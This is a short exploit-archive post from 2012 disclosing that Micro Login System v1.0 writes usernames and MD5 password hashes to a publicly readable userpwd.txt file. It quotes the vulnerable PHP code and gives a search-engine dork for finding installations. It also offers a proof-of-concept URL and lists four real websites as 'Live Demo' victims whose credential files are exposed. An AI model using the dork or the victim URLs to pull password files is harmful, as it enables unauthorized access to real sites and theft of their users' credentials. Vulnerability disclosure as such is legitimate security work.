facebook facebook twitter rss

Micro Login System v 1.0 Read password

Author: Warlock , Published: 19-05-2012
+---------------------------------------------------------------------------------------------------+
|-> Author: Warlock |
|-> Exploit Title : Micro Login System v 1.0 Read password :) |
|-> Vendor Site : http://www.phptoys.com/downloads/microLoginSystem.zip |
|-> Version : v1.0 |
|-> Date : 18/05/12 |
|-> Google Dork : intext:"Micro Login System v 1.0" |
+---------------------------------------------------------------------------------------------------+
1) Vuln in common.php in line 26 -> 30 :

Check user existance
$pfile = fopen("userpwd.txt","a+"); <----- Creat passwd fichier :)
rewind($pfile);

If everything is OK -> store user data
if ($errorText == ''){
// Secure password string
$userpass = md5($pass1); <--- Hhhh Md5 :)

fwrite($pfile, "\r\n$user:$userpass"); <------ now you can see user and pass(md5) in userpwd.txt
}
2) P0c :
http://127.0.0.1/{path}/userpwd.txt (now you can see your user and pass :) )

3) Live Demo :
http://www.bryceskiteam.org/userpwd.txt
http://www.licariautobodysupply.com/pricelist/userpwd.txt
http://www.showtimeny.com/userpwd.txt
http://www.iberconnectionpt.com/userpwd.txt

+--------------------------------------------------------------------------------------------------------+
|-> Spec!&l 10x 2 : Black-ID - Damane2011 - Robert Miles - BaC-Dz - Tn_Sploiter :) |
|-> Great'z : Sec4ever - is-sec.org - v4-team - vbspiders - all arab hack or security forum :) |
|-> exploit-db.com - exploit4arab.com - 1337day.com |
+---------------------------------------------------------------------------------------------------------+

Like us on Facebook :